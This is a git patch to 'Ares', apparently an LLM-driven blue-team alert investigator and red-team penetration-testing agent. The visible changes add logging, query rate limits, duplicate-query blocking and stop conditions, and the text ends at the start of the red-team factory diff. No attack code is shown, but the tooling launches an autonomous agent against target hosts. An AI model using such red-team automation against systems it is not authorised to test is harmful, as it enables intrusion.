detection logic replaced by new global query/tool call limiters --- .gitignore | 1 + README.md | 26 +- Taskfile.yaml | 136 ++++++- docs/taskfile_usage.md | 19 +- src/ares/agents/blue/soc_investigator.py | 84 +++- src/ares/core/factories/blue_factory.py | 360 ++++++++++++++++-- src/ares/core/factories/red_factory.py | 95 ++++- src/ares/tools/blue/actions.py | 160 +++++--- src/ares/tools/blue/investigation.py | 26 ++ src/ares/tools/red/network.py | 50 ++- templates/agent/initial_alert_prompt.md.jinja | 34 +- templates/agent/system_instructions.md.jinja | 288 +++++++++++++- 12 files changed, 1122 insertions(+), 157 deletions(-) diff --git a/.gitignore b/.gitignore index 6450c881..0bef9302 100644 --- a/.gitignore +++ b/.gitignore @@ -6,6 +6,7 @@ test-alerts/ TODO .tool-versions /reports/ +/logs/ # Custom parquet storage *.parquet diff --git a/README.md b/README.md index cd924415..093cd982 100644 --- a/README.md +++ b/README.md @@ -171,7 +171,7 @@ uv run python -m ares \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ --args.poll-interval 30 \ - --args.max-steps 50 \ + --args.max-steps 30 \ --args.report-dir ./reports # Run once and exit (process current alerts only) @@ -186,7 +186,7 @@ Investigate a specific alert by providing it as JSON: uv run python -m ares investigate-alert test-alerts/example-alert.json \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ - --args.max-steps 15 + --args.max-steps 30 ``` #### Red Team - Penetration Testing @@ -222,7 +222,7 @@ task ares:red: TARGET=192.168.1.100 # Or via CLI uv run python -m ares red-team 192.168.1.100 \ --args.model claude-sonnet-4-20250514 \ - --args.max-steps 50 \ + --args.max-steps 30 \ --args.report-dir ./reports ``` @@ -239,15 +239,27 @@ bloodhound-python). | `--args.model` | `claude-sonnet-4-20250514` | LLM model to use | | `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP | | `--args.poll-interval` | `30` | Seconds between alert polls | -| `--args.max-steps` | `50` | Maximum agent steps per investigation | +| `--args.max-steps` | `30` | Maximum LLM round trips per investigation | | `--args.report-dir` | `./reports` | Directory for markdown reports | | `--args.once` | `false` | Process current alerts once and exit | +**Stop Conditions:** + +The agent stops when **any** of these conditions are met: + +- `complete_investigation()` tool is called (normal completion) +- `escalate_investigation()` tool is called (escalation to human) +- 5 Loki/Prometheus queries executed +- 20 total tool calls made (prevents infinite loops) +- `max_steps` LLM round trips reached + **Timeout Behavior:** -The agent timeout is `max_steps × 60 seconds` (1 minute per step). When using -Taskfile, one-shot modes (`ares:blue:once:`, `ares:investigate`) default to 15 -steps (~15 min), while polling modes default to 50 steps (~50 min per alert). +The agent has multiple timeout layers: + +- Hard timeout: `max_steps × 60 seconds` (1 minute per step) +- Watchdog thread: Force-exits if timeout exceeded +- When using Taskfile, defaults are 15 steps (once mode) or 50 steps (polling mode) **Dreadnode Platform Arguments (`--dn-args.*`):** diff --git a/Taskfile.yaml b/Taskfile.yaml index 958be2ff..bdfc31a2 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -18,6 +18,7 @@ vars: MAX_STEPS: '{{.MAX_STEPS | default "50"}}' MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}' + LOG_DIR: '{{.LOG_DIR | default "./logs"}}' DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}' DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE | default "ares-protocol"}}' @@ -161,6 +162,10 @@ tasks: export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "") export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "") + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -171,7 +176,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:once: desc: Run blue team agent once and exit (uses 1Password for API keys) @@ -186,6 +192,10 @@ tasks: export GRAFANA_API_KEY=$(op item get "Ares Grafana MCP" --fields grafana-token --reveal 2>/dev/null || echo "") export ANTHROPIC_API_KEY=$(op item get "claude.ai" --fields dreadnode-api-key --reveal 2>/dev/null || echo "") + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -197,7 +207,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:local: desc: Run blue team agent using .env file (no 1Password) @@ -217,6 +228,10 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -226,7 +241,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:blue:local:once: desc: Run blue team agent once and exit using .env file (no 1Password) @@ -246,6 +262,10 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/blue-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ @@ -256,7 +276,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.DREADNODE_PROJECT}} + --dn-args.project {{.DREADNODE_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:investigate: desc: "Investigate a specific alert from JSON file (usage: task ares:investigate ALERT=alert.json)" @@ -409,6 +430,99 @@ tasks: echo "✅ Reports cleaned" fi + # =========================================================================== + # Ares Local Log Management + # =========================================================================== + + ares:logs:list: + desc: List all local agent logs + cmds: + - | + echo "Agent Logs:" + echo "===========" + if [ -d {{.LOG_DIR}} ]; then + ls -lht {{.LOG_DIR}}/*.log 2>/dev/null || echo "No logs found" + else + echo "Log directory not found: {{.LOG_DIR}}" + fi + + ares:logs:tail: + desc: "Tail the latest log file (usage: task ares:logs:tail [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Log file: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:blue: + desc: "Tail the latest blue team log (usage: task ares:logs:blue [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/blue-*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No blue team logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Blue team log: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:red: + desc: "Tail the latest red team log (usage: task ares:logs:red [LINES=100] [FOLLOW=true])" + vars: + LINES: '{{.LINES | default "100"}}' + FOLLOW: '{{.FOLLOW | default "false"}}' + cmds: + - | + LATEST=$(ls -t {{.LOG_DIR}}/red-*.log 2>/dev/null | head -1) + if [ -z "$LATEST" ]; then + echo "No red team logs found in {{.LOG_DIR}}" + exit 1 + fi + + echo "📋 Red team log: $LATEST" + echo "======================================================================" + + if [ "{{.FOLLOW}}" = "true" ]; then + tail -f "$LATEST" + else + tail -n {{.LINES}} "$LATEST" + fi + + ares:logs:clean: + desc: Remove all local agent logs + cmds: + - | + read -p "Delete all logs in {{.LOG_DIR}}? (y/N) " -n 1 -r + echo + if [[ $REPLY =~ ^[Yy]$ ]]; then + rm -rf {{.LOG_DIR}}/*.log + echo "✅ Logs cleaned" + fi + ares:version: desc: Show Ares version information cmds: @@ -522,6 +636,10 @@ tasks: echo "✅ Resolved to: $RESOLVED_TARGET" fi + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares red-team "$RESOLVED_TARGET" \ --args.model {{.MODEL}} \ --args.max-steps {{.MAX_STEPS}} \ @@ -530,7 +648,8 @@ tasks: --dn-args.token "$DREADNODE_API_KEY" \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.REDTEAM_PROJECT}} + --dn-args.project {{.REDTEAM_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:red:local: desc: "Run red team agent using .env file (usage: task ares:red:local TARGET=192.168.1.100)" @@ -551,6 +670,10 @@ tasks: . ./.env set +a + mkdir -p {{.LOG_DIR}} + LOGFILE="{{.LOG_DIR}}/red-$(date +%Y%m%d-%H%M%S).log" + echo "📝 Logging to: $LOGFILE" + uv run python -m ares red-team {{.TARGET}} \ --args.model {{.MODEL}} \ --args.max-steps {{.MAX_STEPS}} \ @@ -558,7 +681,8 @@ tasks: --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.organization {{.DREADNODE_ORGANIZATION}} \ --dn-args.workspace {{.DREADNODE_WORKSPACE}} \ - --dn-args.project {{.REDTEAM_PROJECT}} + --dn-args.project {{.REDTEAM_PROJECT}} \ + 2>&1 | tee -a "$LOGFILE" ares:red:logs: desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])" diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md index ba7b502c..1b7d53f3 100644 --- a/docs/taskfile_usage.md +++ b/docs/taskfile_usage.md @@ -304,17 +304,30 @@ All tasks support the following configuration variables: | `MODEL` | `claude-sonnet-4-20250514` | LLM model to use | | `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts | | `POLL_INTERVAL` | `30` | Seconds between alert polls | -| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (~50 min timeout) | -| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes (~15 min timeout) | +| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (Taskfile override, code default is 30) | +| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes | | `REPORT_DIR` | `./reports` | Directory for markdown reports | | `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL | | `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name | | `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name | | `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name | +**Stop Conditions:** + +The agent will stop when **any** of these conditions are met: + +- Agent calls `complete_investigation()` (normal completion) +- Agent calls `escalate_investigation()` (escalation to human) +- 5 Loki/Prometheus queries executed +- **20 total tool calls made** (prevents infinite loops) +- `max_steps` LLM round trips reached + **Timeout Behavior:** -The agent timeout is calculated as `max_steps × 60 seconds` (1 minute per step): +The agent has multiple timeout layers: + +- Hard timeout: `max_steps × 60 seconds` (1 minute per step) +- Watchdog thread: Force-exits if timeout exceeded | Mode | Default Steps | Max Timeout | | --- | --- | --- | diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index e20f5f80..c528cc52 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -13,8 +13,8 @@ import dreadnode as dn from loguru import logger -from ares.core.factories.blue_factory import create_investigation_agent -from ares.core.models import InvestigationState +from ares.core.factories.blue_factory import create_investigation_agent, reset_query_tracking +from ares.core.models import InvestigationState, TimelineEvent from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient @@ -159,7 +159,7 @@ def __init__( grafana_api_key: str, mitre_client: MITREAttackClient, report_dir: Path, - max_steps: int = 150, + max_steps: int = 30, ): self.model = model self.grafana_url = grafana_url @@ -244,6 +244,9 @@ async def investigate(self, alert: dict) -> dict: logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") + # Reset query tracking for this investigation + reset_query_tracking() + # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, @@ -270,14 +273,33 @@ async def investigate(self, alert: dict) -> dict: annotations = alert.get("annotations", {}) for key in ["mitre_technique", "mitre", "technique_id", "technique"]: if labels.get(key): - state.identified_techniques.add(labels[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}") + tech_id = labels[key] + state.identified_techniques.add(tech_id) + # Resolve technique name and tactic + technique = self.mitre_client.get_technique(tech_id) + if technique: + state.technique_names[tech_id] = technique.name + state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + state.identified_tactics.add(technique.tactic) + logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") break if annotations.get(key): - state.identified_techniques.add(annotations[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") + tech_id = annotations[key] + state.identified_techniques.add(tech_id) + # Resolve technique name and tactic + technique = self.mitre_client.get_technique(tech_id) + if technique: + state.technique_names[tech_id] = technique.name + state.technique_to_tactic[tech_id] = technique.tactic or "Unknown" + if technique.tactic: + state.identified_tactics.add(technique.tactic) + logger.info(f"Auto-recorded MITRE technique from alert: {tech_id}") break + # Create initial timeline event from alert + self._create_alert_timeline_event(state, alert) + initial_prompt = build_initial_prompt(alert) with dn.run(tags=["soc-investigation", alert_name]): @@ -371,6 +393,54 @@ async def investigate(self, alert: dict) -> dict: # Always cancel the watchdog on normal completion watchdog.cancel() + def _create_alert_timeline_event(self, state: InvestigationState, alert: dict) -> None: + """Create an initial timeline event from the alert.""" + labels = alert.get("labels", {}) + annotations = alert.get("annotations", {}) + + # Parse alert timestamp + starts_at = alert.get("startsAt", "") + try: + if starts_at: + alert_time = datetime.fromisoformat(starts_at.replace("Z", "+00:00")) + else: + alert_time = datetime.now(timezone.utc) + except ValueError: + alert_time = datetime.now(timezone.utc) + + # Build description from alert + alert_name = labels.get("alertname", "Unknown Alert") + severity = labels.get("severity", "unknown") + summary = annotations.get("summary", annotations.get("description", "")) + + description = f"{severity.upper()} alert triggered: {alert_name}" + if summary: + description += f" - {summary[:100]}" + + # Get MITRE technique from alert + mitre_techniques = [] + for key in ["mitre_technique", "mitre", "technique_id"]: + if labels.get(key): + mitre_techniques.append(labels[key]) + break + if annotations.get(key): + mitre_techniques.append(annotations[key]) + break + + # Create timeline event + event = TimelineEvent( + id="tl-alert-0000", + timestamp=alert_time, + description=description, + evidence_ids=[], + mitre_techniques=mitre_techniques, + confidence=0.9, + source="alert", + ) + + state.timeline.append(event) + logger.info(f"Created initial timeline event from alert: {description[:50]}...") + def _generate_report(self, state: InvestigationState, _result) -> Path: """Generate the markdown investigation report.""" from ares.reports.investigation import MarkdownReportGenerator diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index 5cc06de2..cf96a4b8 100644 --- a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -1,10 +1,13 @@ """Factory for creating investigation agents with presets.""" +import functools +from typing import Any + import dreadnode as dn from dreadnode.agent import Agent -from dreadnode.agent.events import AgentStalled, ToolEnd, ToolStart +from dreadnode.agent.events import AgentEvent, AgentStalled, ToolEnd, ToolStart from dreadnode.agent.hooks import retry_with_feedback -from dreadnode.agent.stop import tool_use +from dreadnode.agent.stop import StopCondition, tool_use from dreadnode.agent.thread import Thread from loguru import logger @@ -24,62 +27,339 @@ # Load system instructions from template SYSTEM_INSTRUCTIONS = get_template_loader().render("agent/system_instructions.md.jinja") -# Track consecutive query calls without workflow progress -_consecutive_queries = [] +# Track query calls - reset per investigation via reset_query_tracking() +_total_queries = 0 +_consecutive_queries: list[str] = [] +_query_limit_hit = False +_executed_queries: list[dict] = [] +_seen_queries: dict[str, int] = {} # Track query -> count to detect loops +_current_state: "InvestigationState | None" = None +MAX_QUERIES_PER_INVESTIGATION = 5 +MAX_QUERIES_CRITICAL = 8 # Higher limit for critical alerts +MAX_DUPLICATE_QUERIES = 2 # Max times same query can run before blocking + + +def reset_query_tracking(): + """Reset query tracking for a new investigation.""" + global \ + _total_queries, \ + _consecutive_queries, \ + _query_limit_hit, \ + _executed_queries, \ + _seen_queries, \ + _current_state + _total_queries = 0 + _consecutive_queries = [] + _query_limit_hit = False + _executed_queries = [] + _seen_queries = {} + _current_state = None + + +def set_investigation_state(state: "InvestigationState"): + """Set the current investigation state for query recording.""" + global _current_state + _current_state = state + + +def _get_query_limit() -> int: + """Get the query limit based on alert severity.""" + if _current_state: + severity = _current_state.alert.get("labels", {}).get("severity", "").lower() + if severity == "critical": + return MAX_QUERIES_CRITICAL + return MAX_QUERIES_PER_INVESTIGATION + + +def _check_query_limit() -> str | None: + """Check if query limit is reached. Returns error message if limit hit, None otherwise.""" + global _query_limit_hit + limit = _get_query_limit() + if _query_limit_hit or _total_queries >= limit: + _query_limit_hit = True + return ( + f"🛑 QUERY LIMIT REACHED ({_total_queries}/{limit}). You have exceeded the maximum number of queries.\n\n" + "You MUST call complete_investigation(summary='...', attack_synopsis='...', recommendations=[...]) NOW.\n\n" + "Summarize what you found from previous queries and complete the investigation.\n" + "Do NOT attempt any more queries - they will all be blocked.\n\n" + "REMEMBER: Include attack_synopsis (narrative of what happened) and recommendations (list of actions).\n\n" + "Example:\n" + "complete_investigation(\n" + " summary='Investigated [alert name]. Found [evidence/no evidence]. Confidence: [level].',\n" + " attack_synopsis='At [time], [user/IP] performed [action] against [target]...',\n" + " recommendations=['Reset compromised passwords', 'Block source IP', ...]\n" + ")" + ) + return None + + +def _check_duplicate_query(query: str) -> str | None: + """Check if query is a duplicate. Returns error message if duplicate limit hit.""" + # Normalize query for comparison (strip whitespace, lowercase) + normalized = query.strip().lower() + + count = _seen_queries.get(normalized, 0) + if count >= MAX_DUPLICATE_QUERIES: + logger.warning(f"🔁 Duplicate query blocked (run {count + 1} times): {query[:100]}...") + return ( + f"🔁 DUPLICATE QUERY BLOCKED. You've already run this query {count} times.\n\n" + "**DO NOT re-run the same query.** Instead:\n\n" + "1. **PARSE THE RESULTS** you already received\n" + "2. **EXTRACT IOCs** from the JSON:\n" + " - Look for 'computer' field → record as hostname\n" + " - Look for 'TargetUserName' in event_data → record as user\n" + " - Look for 'IpAddress' in event_data → record as IP\n" + "3. **CALL record_evidence()** for each IOC found\n" + "4. **Then try a DIFFERENT query** or call complete_investigation()\n\n" + "Example extraction from previous results:\n" + "```\n" + "record_evidence(evidence_type='hostname', value='winterfell.north.sevenkingdoms.local', ...)\n" + "record_evidence(evidence_type='user', value='robb.stark', ...)\n" + "```" + ) + + # Increment count + _seen_queries[normalized] = count + 1 + return None + + +def _increment_query_count(tool_name: str): + """Increment query counter and log.""" + global _total_queries + _total_queries += 1 + _consecutive_queries.append(tool_name) + if len(_consecutive_queries) > 5: + _consecutive_queries.pop(0) + limit = _get_query_limit() + logger.info(f"📊 Query count: {_total_queries}/{limit}") + + +def _record_query(tool_name: str, kwargs: dict, result_count: int | None = None): + """Record a query to the investigation state.""" + from datetime import datetime, timezone + + query_record = { + "type": tool_name, + "query": kwargs.get("logql") or kwargs.get("expr") or str(kwargs), + "timestamp": datetime.now(timezone.utc).isoformat(), + "result_count": result_count, + "datasource": kwargs.get("datasourceUid", "unknown"), + } + _executed_queries.append(query_record) + + # Also add to investigation state if available + if _current_state: + _current_state.executed_queries.append(query_record) + + +def create_rate_limited_mcp_tool(original_tool: Any) -> Any: + """ + Wrap an MCP tool with rate limiting. + + The wrapper checks the global query counter BEFORE executing. + If limit is reached, returns an error message instead of executing. + This ensures the LLM sees the limit message even when batching queries. + """ + # Get the tool name for checking if it's a query tool + tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "") + + # Only wrap query tools + if "query_loki" not in tool_name and "query_prometheus" not in tool_name: + return original_tool + + logger.debug(f"Wrapping MCP tool with rate limiting: {tool_name}") + + # Get the original function to wrap + original_fn = getattr(original_tool, "fn", None) + if original_fn is None and callable(original_tool): + original_fn = original_tool + + if original_fn is None: + logger.warning(f"Could not find callable for tool {tool_name}, not wrapping") + return original_tool + + @functools.wraps(original_fn) + async def rate_limited_wrapper(*args, **kwargs): + # Check limit BEFORE executing + error_msg = _check_query_limit() + if error_msg: + logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached") + return error_msg + + # Check for duplicate query + query_str = kwargs.get("logql") or kwargs.get("expr") or "" + if query_str: + dup_msg = _check_duplicate_query(query_str) + if dup_msg: + logger.warning(f"🔁 Blocking duplicate query: {query_str[:50]}...") + return dup_msg + + # Increment counter + _increment_query_count(tool_name) + + # Execute original + try: + result = await original_fn(*args, **kwargs) + # Record the query with result count + result_count = None + if isinstance(result, list): + result_count = len(result) + elif isinstance(result, dict) and "results" in result: + result_count = len(result.get("results", [])) + elif isinstance(result, str): + # Try to estimate result count from string response + result_count = result.count("\n") if result else 0 + _record_query(tool_name, kwargs, result_count) + return result + except Exception as e: + error_str = str(e) + # Handle gRPC timeout from mcp-grafana (10s default timeout) + if "grpc" in error_str.lower() and "connection is closing" in error_str: + logger.warning(f"Query tool {tool_name} timed out (mcp-grafana 10s limit)") + _record_query(tool_name, kwargs, result_count=0) + return { + "error": "Query timed out due to mcp-grafana 10s limit. " + "Try a shorter time range (e.g., last 1 hour instead of 24 hours) " + "or add more specific label filters to reduce the query scope." + } + logger.error(f"Query tool {tool_name} failed: {e}") + # Record failed query + _record_query(tool_name, kwargs, result_count=0) + raise + + # Create a new tool with the wrapped function + # Try to preserve the tool structure for dreadnode SDK + if hasattr(original_tool, "fn"): + # It's a Tool object with a .fn attribute + original_tool.fn = rate_limited_wrapper + return original_tool + # It's a callable, just return the wrapper + rate_limited_wrapper.__name__ = tool_name + return rate_limited_wrapper + + +def wrap_mcp_query_tools(mcp_tools: list) -> list: + """ + Wrap all query-related MCP tools with rate limiting. + + Args: + mcp_tools: List of MCP tools from Grafana MCPClient + + Returns: + List of tools with query tools wrapped for rate limiting + """ + wrapped = [] + wrapped_count = 0 + + for tool in mcp_tools: + tool_name = getattr(tool, "name", "") or getattr(tool, "__name__", str(tool)) + + if "query_loki" in tool_name or "query_prometheus" in tool_name: + wrapped_tool = create_rate_limited_mcp_tool(tool) + wrapped.append(wrapped_tool) + wrapped_count += 1 + logger.info(f"✅ Wrapped query tool: {tool_name}") + else: + wrapped.append(tool) + + logger.info(f"Wrapped {wrapped_count} query tools with rate limiting") + return wrapped async def log_tool_usage(event: ToolStart): - """Log tool calls for observability and detect loops.""" + """Log tool calls for observability.""" + # Note: Query counting is now handled by the rate-limited wrapper (create_rate_limited_mcp_tool) + # This hook only handles logging and metrics if hasattr(event, "tool_call") and event.tool_call: tool_name = event.tool_call.name logger.info(f"🔧 Tool call: {tool_name}") dn.log_metric(f"tool_{tool_name}", 1, mode="count") - # Track if agent is stuck in query loop - if "query_loki" in tool_name or "query_prometheus" in tool_name: - _consecutive_queries.append(tool_name) - # Keep only last 5 calls - if len(_consecutive_queries) > 5: - _consecutive_queries.pop(0) - - # If last 3 calls are all queries, warn - if len(_consecutive_queries) >= 3 and all( - "query_loki" in t or "query_prometheus" in t for t in _consecutive_queries[-3:] - ): - logger.warning( - "⚠️ DETECTED QUERY LOOP: 3+ consecutive queries without recording evidence" - ) - logger.warning( - "Agent should call record_evidence() or get_combined_questions() next" - ) - elif "record_evidence" in tool_name or "get_combined_questions" in tool_name: - # Reset counter when workflow tools are called + # Clear consecutive queries on completion + if "complete_investigation" in tool_name or "escalate_investigation" in tool_name: _consecutive_queries.clear() async def log_tool_result(event: ToolEnd): - """Log tool results.""" + """Log tool results for observability.""" + # Note: Query limit enforcement is now handled by the rate-limited wrapper + # The wrapper returns an error message BEFORE execution, so the LLM sees it if hasattr(event, "tool_call") and event.tool_call: + tool_name = event.tool_call.name if hasattr(event, "error") and event.error: - logger.warning(f"❌ Tool {event.tool_call.name} failed: {event.error}") + logger.warning(f"❌ Tool {tool_name} failed: {event.error}") dn.log_metric("tool_errors", 1, mode="count") else: - logger.info(f"✅ Tool {event.tool_call.name} completed") + logger.info(f"✅ Tool {tool_name} completed") unstall_hook = retry_with_feedback( event_type=AgentStalled, feedback=( - "You seem stuck. Remember:\n" - "1. Call get_combined_questions() to get next questions\n" - "2. Execute queries in PARALLEL to answer those questions\n" - "3. Record evidence with record_evidence() for EVERY finding\n" - "4. When done, call complete_investigation() or escalate_investigation()\n\n" - "If queries return empty results, document that and try broader queries OR move forward." + "🛑 YOU ARE STUCK. You MUST call complete_investigation() NOW with ALL parameters.\n\n" + "Required parameters:\n" + "1. summary: What you found (or 'No malicious activity confirmed' if nothing)\n" + "2. attack_synopsis: Narrative of what happened chronologically\n" + "3. recommendations: List of actions to take (check alert annotations for 'response' guidance)\n\n" + "Example:\n" + "complete_investigation(\n" + " summary='Investigated DCSync alert. No matching events in time window. Confidence: Low.',\n" + " attack_synopsis='Alert triggered at [time] for potential DCSync activity. " + "Investigation found no corroborating evidence in Loki logs.',\n" + " recommendations=['Continue monitoring for Event 4662', 'Review DC access logs manually']\n" + ")\n\n" + "DO NOT make more queries. Call complete_investigation() NOW." ), ) +def max_queries_stop(max_queries: int = 5) -> StopCondition: + """Stop condition that fires after max_queries Loki/Prometheus queries.""" + from collections.abc import Sequence + + def stop(events: Sequence[AgentEvent]) -> bool: + query_count = sum( + 1 + for e in events + if isinstance(e, ToolEnd) + and hasattr(e, "tool_call") + and e.tool_call + and ("query_loki" in e.tool_call.name or "query_prometheus" in e.tool_call.name) + ) + if query_count >= max_queries: + logger.critical( + f"🛑 STOP CONDITION: Max queries ({max_queries}) reached. Forcing stop." + ) + return True + return False + + return StopCondition(stop, name="stop_on_max_queries") + + +def max_tool_calls_stop(max_calls: int = 20) -> StopCondition: + """Stop condition that fires after max_calls TOTAL tool calls without completion. + + This is a safety net to prevent infinite loops when the agent keeps calling + non-query tools (record_evidence, get_combined_questions, etc.) without + ever calling complete_investigation. + """ + from collections.abc import Sequence + + def stop(events: Sequence[AgentEvent]) -> bool: + tool_count = sum( + 1 for e in events if isinstance(e, ToolEnd) and hasattr(e, "tool_call") and e.tool_call + ) + if tool_count >= max_calls: + logger.critical( + f"🛑 STOP CONDITION: Max tool calls ({max_calls}) reached without completion. " + "Agent must call complete_investigation() or escalate_investigation()." + ) + return True + return False + + return StopCondition(stop, name="stop_on_max_tool_calls") + + def create_investigation_agent( model: str, grafana_url: str, @@ -87,7 +367,7 @@ def create_investigation_agent( mitre_client: MITREAttackClient, state: InvestigationState, grafana_mcp_tools: list | None = None, - max_steps: int = 150, + max_steps: int = 30, ) -> Agent: """ Create a configured investigation agent. @@ -104,6 +384,9 @@ def create_investigation_agent( Returns: Configured agent ready to investigate """ + # Set state for query recording + set_investigation_state(state) + grafana_tools = GrafanaTools( base_url=grafana_url, api_key=grafana_api_key, @@ -111,6 +394,7 @@ def create_investigation_agent( investigation_tools = InvestigationTools() investigation_tools.set_state(state) + investigation_tools.set_mitre_client(mitre_client) question_tools = QuestionEngineTools() question_tools.set_engines(mitre_client, state) @@ -137,10 +421,12 @@ def create_investigation_agent( escalate_investigation, ] - # Add Grafana MCP tools if available + # Add Grafana MCP tools if available - with rate limiting on query tools if grafana_mcp_tools: logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent") - tools.extend(grafana_mcp_tools) + # Wrap query tools with rate limiting to prevent infinite query loops + wrapped_tools = wrap_mcp_query_tools(grafana_mcp_tools) + tools.extend(wrapped_tools) else: logger.warning( "No Grafana MCP tools available - agent will have limited query capabilities" @@ -160,6 +446,8 @@ def create_investigation_agent( stop_conditions=[ tool_use("complete_investigation"), tool_use("escalate_investigation"), + max_queries_stop(max_queries=5), # Force stop after 5 queries + max_tool_calls_stop(max_calls=20), # Force stop after 20 total tool calls ], thread=Thread(), # type: ignore[call-arg] ) diff --git a/src/ares/core/factories/red_factory.py b/src/ares/core/factories/red_factory.py index 483bb3ae..4c2b525c 100644 --- a/src/ares/core/factories/red_factory.py +++ b/src/ares/core/factories/red_factory.py @@ -1,5 +1,7 